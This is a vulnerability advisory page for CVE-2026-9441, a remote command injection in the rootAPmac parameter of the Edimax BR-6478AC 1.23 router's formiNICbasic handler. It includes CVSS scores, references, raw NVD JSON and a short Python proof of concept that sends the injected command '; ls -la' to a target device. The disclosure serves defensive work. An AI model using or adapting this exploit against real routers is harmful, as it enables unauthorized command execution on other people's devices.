CVE-2026-9441

Description

A security flaw has been discovered in Edimax BR-6478AC 1.23. Affected by this issue is the function formiNICbasic of the file /goform/formiNICbasic of the component POST Request Handler. Performing a manipulation of the argument rootAPmac results in command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.

CVSS Details

CVSS Score

6.3

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Edimax BR-6478AC 1.23

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests

def exploit_cve_2026_9441(target_ip):
    url = f"http://{target_ip}/goform/formiNICbasic"
    # Example payload: execute 'ls' command
    # The semicolon is used to chain commands in many shell environments
    payload = "; ls -la"
    
    data = {
        "rootAPmac": payload
    }
    
    try:
        print(f"[*] Sending payload to {url}...")
        response = requests.post(url, data=data, timeout=5)
        print(f"[*] Response Status: {response.status_code}")
        print("[*] Response Content:")
        print(response.text)
    except requests.exceptions.RequestException as e:
        print(f"[!] Error: {e}")

if __name__ == "__main__":
    target = "192.168.1.1" # Replace with actual target IP
    exploit_cve_2026_9441(target)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-9441
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-9441
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-9441/
[4] VulDB https://vuldb.com/cve/CVE-2026-9441
[5] https://lavender-bicycle-a5a.notion.site/EDIMAX-BR6478ACV2-formiNICbasic-34b53a41781f808bbc45e8ca54f93dd1?source=copy_link
[6] https://vuldb.com/submit/818450
[7] https://vuldb.com/vuln/365422
[8] https://vuldb.com/vuln/365422/cti

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-9441", "sourceIdentifier": "[email protected]", "published": "2026-05-25T10:16:15.780", "lastModified": "2026-05-25T10:16:15.780", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in Edimax BR-6478AC 1.23. Affected by this issue is the function formiNICbasic of the file /goform/formiNICbasic of the component POST Request Handler. Performing a manipulation of the argument rootAPmac results in command injection. The attack can be initiated remotely. The exploit has been released to the public and may be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 2.1, "baseSeverity": "LOW", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.4}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:P/I:P/A:P", "baseScore": 6.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-77"}]}], "references": [{"url": "https://lavender-bicycle-a5a.notion.site/EDIMAX-BR6478ACV2-formiNICbasic-34b53a41781f808bbc45e8ca54f93dd1?source=copy_link", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/818450", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365422", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/365422/cti", "source": "[email protected]"}]}}